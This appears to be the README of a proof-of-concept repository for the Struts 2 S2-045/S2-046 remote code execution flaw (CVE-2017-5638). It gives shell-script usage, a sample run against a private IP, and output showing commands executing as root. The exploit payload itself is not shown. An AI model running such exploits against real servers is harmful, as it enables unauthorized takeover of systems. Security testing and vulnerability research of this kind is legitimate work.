/S2-046_S2-045_POC

S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)

Primary LanguageShell

S2-046_POC

Usage:

./s2_046.sh [url]
./s2_045.sh [url]

Sample:

  1. chmod +x ./s2_046.sh
  2. ./s2_046.sh http://172.16.152.135/index.action

OUTPUT:

================HTTP GET Method================
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
================HTTP POST Method================
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023